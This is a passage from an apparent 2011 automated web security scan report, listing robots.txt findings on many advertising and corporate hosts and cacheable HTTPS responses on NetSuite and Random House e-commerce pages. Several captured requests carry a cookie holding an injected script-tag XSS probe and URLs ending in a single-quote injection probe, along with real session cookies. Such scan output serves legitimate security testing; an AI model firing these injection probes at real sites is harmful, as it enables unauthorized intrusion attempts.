ETag: "041ea751a97c91:175f0"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

User-agent: *
Disallow: /*.axd$
Disallow: /~search/fr.aspx

26.13. http://moxieinsight.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moxieinsight.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: moxieinsight.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:03:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://moxieinsight.com/moxieinsight/xmlrpc.php
Link: <http://bit.ly/gXmflI>; rel=shortlink
Set-Cookie: PHPSESSID=c01abeec209b7e51fe5f2a07a9e7dab3; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

26.14. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/plain
Last-Modified: Thu, 31 Mar 2011 18:11:40 GMT
Accept-Ranges: bytes
ETag: "056315cfefcb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 20:58:43 GMT
Connection: keep-alive
Content-Length: 44

# do not index
User-agent: *
Disallow: /

26.15. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"25-1284655556000"
Accept-Ranges: bytes
Content-Length: 25
Date: Tue, 26 Apr 2011 20:58:56 GMT
Connection: close
Last-Modified: Thu, 16 Sep 2010 16:45:56 GMT
Server: Test & Target
Content-Type: text/plain

User-agent: *
Disallow: /

26.16. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rad.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Type: text/plain
Last-Modified: Fri, 18 Mar 2011 23:41:20 GMT
Accept-Ranges: bytes
ETag: "01071fbc5e5cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:36:16 GMT
Connection: keep-alive
Content-Length: 28

User-agent: *
Disallow: /

26.17. http://s7.addthis.com/js/addthis_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/addthis_widget.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:18 GMT
ETag: "e01e35-1b-4a143749a6980"
Content-Type: text/plain; charset=UTF-8
Date: Tue, 26 Apr 2011 22:40:26 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


26.18. http://spe.atdmt.com/ds/AANYCCITICIT/2011_Continuity_Revised/BND_Trapeze2011_FL_300x250_RV2_MSN.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /ds/AANYCCITICIT/2011_Continuity_Revised/BND_Trapeze2011_FL_300x250_RV2_MSN.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 68
Allow: GET
Expires: Fri, 29 Apr 2011 04:37:34 GMT
Date: Tue, 26 Apr 2011 18:36:13 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

26.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.32.180.117
X-Cnection: close
Date: Tue, 26 Apr 2011 21:03:25 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

26.20. http://themes.googleusercontent.com/font  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://themes.googleusercontent.com
Path:   /font

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: themes.googleusercontent.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Tue, 26 Apr 2011 20:11:15 GMT
Expires: Tue, 26 Apr 2011 20:11:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

User-agent: *
Disallow: /

26.21. http://www.actonsoftware.com/acton/bn/1091/visitor.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actonsoftware.com
Path:   /acton/bn/1091/visitor.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.actonsoftware.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"65-1300332243000"
Last-Modified: Thu, 17 Mar 2011 03:24:03 GMT
Content-Type: text/plain
Content-Length: 65
Date: Tue, 26 Apr 2011 21:00:34 GMT
Connection: close

User-agent: *
Disallow: /acton/
Disallow: /company_board.html

26.22. https://www.bcbst.com/accounttools/public/askUserId.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/public/askUserId.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bcbst.com

Response

HTTP/1.1 200 OK
Content-Length: 1651
Content-Type: text/plain
Last-Modified: Fri, 08 Jun 2007 20:25:45 GMT
Accept-Ranges: bytes
ETag: "80ea3031baac71:12352"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTSID=ED271A5E4CC7E09C028A5D93E6AF0E9A; Path=/; Domain=.bcbst.com
Set-Cookie: TLTUID=ED271A5E4CC7E09C028A5D93E6AF0E9A; Path=/; Domain=.bcbst.com expires=Tue, 26-04-2021 20:37:50 GMT
Date: Tue, 26 Apr 2011 20:37:49 GMT
Connection: keep-alive
Set-Cookie: NSC_xxx.cdctu.dpn!443=ffffffff099f1a6445525d5f4f58455e445a4a42378b;path=/;secure;httponly

<!-- Note: MPM disallows are files not found or too large -->

User-agent: *
Disallow: /providers/BlueAlertSearch/
Disallow: /secure*/
Disallow: /sitewide*/
Disallow: /js*/
Disallow: /inc*/
Di
...[SNIP]...

26.23. http://www.freemanco.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemanco.com
Path:   /store

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemanco.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:07:56 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Last-Modified: Tue, 18 Jan 2011 23:41:38 GMT
ETag: "47-49a27710e3080"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-agent: IFT Search Robot
Disallow:

User-agent: *
Disallow: /

26.24. https://www.freemanco.com/store/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.freemanco.com
Path:   /store/index.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemanco.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:51:41 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_jk/1.2.28
Last-Modified: Tue, 18 Jan 2011 23:40:54 GMT
ETag: "47-49a276e6ecd80"
Accept-Ranges: bytes
Content-Length: 71
Connection: close
Content-Type: text/plain

User-agent: IFT Search Robot
Disallow:

User-agent: *
Disallow: /

26.25. http://www.interspire.com/activekb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.interspire.com
Path:   /activekb/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interspire.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:41:42 GMT
Server: Apache
Last-Modified: Tue, 26 May 2009 23:38:21 GMT
ETag: "2b4-46ad938d87540"
Accept-Ranges: bytes
Content-Length: 692
Cache-Control: max-age=432000
Expires: Sun, 01 May 2011 22:41:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /content/authors/login
Disallow: /content/authors/register
Disallow: /content/search
Disallow: /content/articlerss
Disallow: /content/articlerss.php
Disallow: /content/newsrss

...[SNIP]...

26.26. http://www.itasoftware.com/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.itasoftware.com
Path:   /style.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.itasoftware.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:55:34 GMT
Server: Apache
Last-Modified: Mon, 26 Jul 2010 18:07:19 GMT
Accept-Ranges: bytes
Content-Length: 37
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: Browsershots
Disallow:"


26.27. http://www.magellangps.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magellangps.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.magellangps.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:39:24 GMT
Server: Apache
Content-Length: 103
Last-Modified: Sat, 23 Apr 2011 00:28:30 GMT
NS_RTIMER_COMPOSITE: 1571838000:73686F702D6A6176613030372E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NS_VER=2011.1.0; domain=www.magellangps.com; path=/
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=833
Connection: Keep-Alive
Content-Type: text/plain

# Allow all robots to spider everything by disallowing nothing

User-agent: *
Crawl-Delay: 20
Disallow:

26.28. http://www.msn.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.msn.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.msn.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Tue, 26 Apr 2011 18:36:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA41
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
ETag: "0b2a2b9c329cb1:803"
Last-Modified: Thu, 22 Jul 2010 17:31:32 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 464

User-Agent: *
Disallow: /*pgnew=
Disallow: /*_p=
Disallow: /*ucpg=
Disallow: /?f=
Disallow: /?lc=
Disallow: /*&=&
Disallow: /*wa=wsignin1.0
Disallow: /*page=0
Disallow: /*page=&
Disallow: /*login.asp
...[SNIP]...

26.29. http://www.omniture.com/en/products/conversion/testandtarget  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/conversion/testandtarget

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.omniture.com

Response

HTTP/1.0 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 08 Oct 2008 20:17:00 GMT
ETag: "2728085-162b-9942c700"
Accept-Ranges: bytes
Content-Length: 5675
xserver: www6.dmz
Content-Type: text/plain
Date: Tue, 26 Apr 2011 20:57:56 GMT
Connection: close

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /img/
Disallow: /js/
Disallow: /custom/
Disallow: /files/

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFin
...[SNIP]...

27. Cacheable HTTPS response  previous  next
There are 38 instances of this issue:


27.1. https://checkout.netsuite.com/empty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /empty.html

Request

GET /empty.html HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=1142057&sc=4&whence=&n=1&ext=F&redirect_count=1&did_javascript_redirect=T
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; gc=1142057_clear

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:40 GMT
Server: Apache
Cache-Control: private
Cache-Control: max-age=30840
Accept-Ranges: bytes
Content-Length: 168
Expires: Wed, 27 Apr 2011 06:15:40 GMT
Last-Modified: Thu, 21 Apr 2011 07:00:00 GMT
NS_RTIMER_COMPOSITE: 1665556687:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=779
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
</head>
<body>
</body>
</html>

27.2. https://ecommerce.randomhouse.com//account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //account.do

Request

GET //account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:49:24 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 17091


<!-- account.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www
...[SNIP]...

27.3. https://ecommerce.randomhouse.com//create-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //create-address.do

Request

GET //create-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 24044


<!-- createAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...

27.4. https://ecommerce.randomhouse.com//email-password.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //email-password.do

Request

GET //email-password.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:11 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 18043


<!-- updateEmailPassword.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...

27.5. https://ecommerce.randomhouse.com//select-address.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //select-address.do

Request

GET //select-address.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:15 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16341


<!-- selectAddress.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...

27.6. https://ecommerce.randomhouse.com//view-orders.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //view-orders.do

Request

GET //view-orders.do?from=' HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303860175|PC#1303855598284-166145#1366930315|check#true#1303858375; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 23:18:12 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 14600


<!-- orderHistory.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://
...[SNIP]...

27.7. https://ecommerce.randomhouse.com/account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /account.do

Request

GET /account.do?from=randomhouse HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; RES_SESSIONID=212207240983843; ResonanceSegment=1; __qca=P0-874375948-1303855562358; s_cc=true; SC_LINKS=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:06:29 GMT
Server: Apache
Set-Cookie: JSESSIONID=30BCBB9743BBB87336047B037BF512BF.ecommerce_wrk1; Path=/; Secure
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 16859


<!-- signIn.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/
...[SNIP]...

27.8. https://ecommerce.randomhouse.com/address-validator.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /address-validator.do

Request

GET /address-validator.do?zipcode=10010&_= HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
Referer: https://ecommerce.randomhouse.com/create-account-submit.do
X-Prototype-Version: 1.3.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D; JSESSIONID=916E1DF250E4C8F9A222E994DF92BDD0.ecommerce_wrk1; rhecommerce='"--></style></script><script>netsparker(0x000B6E)</script>|null|www.randomhouse.com|3; mbox=session#1303855598284-166145#1303859918|PC#1303855598284-166145#1366930058|check#true#1303858118; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:48:48 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 158


<html>
<head><title>AJAX</title></head>
<body>
<div id="information">
<ADDRESS>
   <CITY>NEW YORK</CITY>
   <STATE>NY</STATE>
</ADDRESS>
</div>
</body>
</html>

27.9. https://ecommerce.randomhouse.com/create-account-submit.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account-submit.do

Request

GET /create-account-submit.do HTTP/1.1
Host: ecommerce.randomhouse.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RES_TRACKINGID=686529694590717; __qca=P0-874375948-1303855562358; s_vi=[CS]v1|26DBA0E0051D3102-60000104C025ACEA[CE]; JSESSIONID=38D14861B5F177BDEE31B25C6E8D7C7F.ecommerce_wrk1; mbox=session#1303855598284-166145#1303858226|PC#1303855598284-166145#1366928366|check#true#1303856426; CP=null*; RES_SESSIONID=212207240983843; ResonanceSegment=1; s_cc=true; s_sq=%5B%5BB%5D%5D; SC_LINKS=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:47:05 GMT
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Length: 20778


<!--createAccount.vm -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.
...[SNIP]...

27.10. https://ecommerce.randomhouse.com/create-account.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   /create-account.do

Request

GET /create-account.do HTTP/1.1
Host: ecommerce.randomhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
